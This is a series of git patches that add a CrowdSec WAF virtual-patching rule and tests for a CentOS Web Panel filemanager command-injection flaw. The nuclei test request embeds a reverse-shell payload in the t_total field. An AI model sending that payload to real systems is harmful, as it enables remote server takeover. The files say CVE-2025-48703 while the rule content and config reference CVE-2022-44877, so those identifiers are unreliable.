From a9c15846a9864f2897969a12d5ad6c1c9f5c55e6 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 18 Sep 2025 19:07:12 +0200 Subject: [PATCH 1/4] Add vpatch-CVE-2025-48703 rule --- .../crowdsecurity/vpatch-CVE-2025-48703.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2025-48703.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-48703.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-48703.yaml new file mode 100644 index 00000000000..2327c2d4173 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-48703.yaml @@ -0,0 +1,35 @@ +## autogenerated on 2025-09-18 17:07:08 +name: crowdsecurity/vpatch-CVE-2022-44877 +description: 'Detects command injection attempts in CWP (CentOS Web Panel) filemanager changePerm endpoint via t_total parameter.' +rules: + - and: + - zones: + - URI + transform: + - lowercase + - urldecode + match: + type: contains + value: /filemanager&acc=changeperm + - zones: + - ARGS + variables: + - t_total + transform: + - lowercase + - urldecode + match: + type: contains + value: '`' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'CWP - RCE' + classification: + - cve.CVE-2022-44877 + - attack.T1190 + - cwe.CWE-77 From 3efaa472b0b5f9ef0f1b964e1c8ac334a075fcd0 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 18 Sep 2025 19:07:13 +0200 Subject: [PATCH 2/4] Add vpatch-CVE-2025-48703 test config --- .appsec-tests/vpatch-CVE-2025-48703/config.yaml | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2025-48703/config.yaml diff --git a/.appsec-tests/vpatch-CVE-2025-48703/config.yaml b/.appsec-tests/vpatch-CVE-2025-48703/config.yaml new file mode 100644 index 00000000000..b5f783a18db --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-48703/config.yaml @@ -0,0 +1,5 @@ +## autogenerated on 2025-09-18 17:07:08 +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml +nuclei_template: CVE-2022-44877.yaml From 95d2e70e3fbfe2f306260475717798d22192bd03 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 18 Sep 2025 19:07:15 +0200 Subject: [PATCH 3/4] Add CVE-2025-48703.yaml test --- .../vpatch-CVE-2025-48703/CVE-2025-48703.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2025-48703/CVE-2025-48703.yaml diff --git a/.appsec-tests/vpatch-CVE-2025-48703/CVE-2025-48703.yaml b/.appsec-tests/vpatch-CVE-2025-48703/CVE-2025-48703.yaml new file mode 100644 index 00000000000..c2f21e4df76 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-48703/CVE-2025-48703.yaml @@ -0,0 +1,21 @@ +## autogenerated on 2025-09-18 17:07:08 +id: CVE-2022-44877 +info: + name: CVE-2022-44877 + author: crowdsec + severity: info + description: CVE-2022-44877 testing + tags: appsec-testing +http: + - raw: + - | + POST /myuser/index.php?module=filemanager&acc=changePerm HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + fileName=.bashrc¤tPath=/home/myuser&t_total=`nc 1.2.3.4 4444 -e /bin/bash` + cookie-reuse: true + matchers: + - type: status + status: + - 403 From 0d7bdcec85daca0f5968bfadf0cb58275534e03c Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Thu, 18 Sep 2025 19:07:17 +0200 Subject: [PATCH 4/4] Add vpatch-CVE-2025-48703 rule to vpatch collection --- collections/crowdsecurity/appsec-virtual-patching.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index be69426f031..7a47919882a 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -90,6 +90,7 @@ appsec-rules: - crowdsecurity/vpatch-CVE-2024-27292 - crowdsecurity/vpatch-CVE-2025-24893 - crowdsecurity/vpatch-CVE-2021-43798 +- crowdsecurity/vpatch-CVE-2025-48703 author: crowdsecurity contexts: - crowdsecurity/appsec_base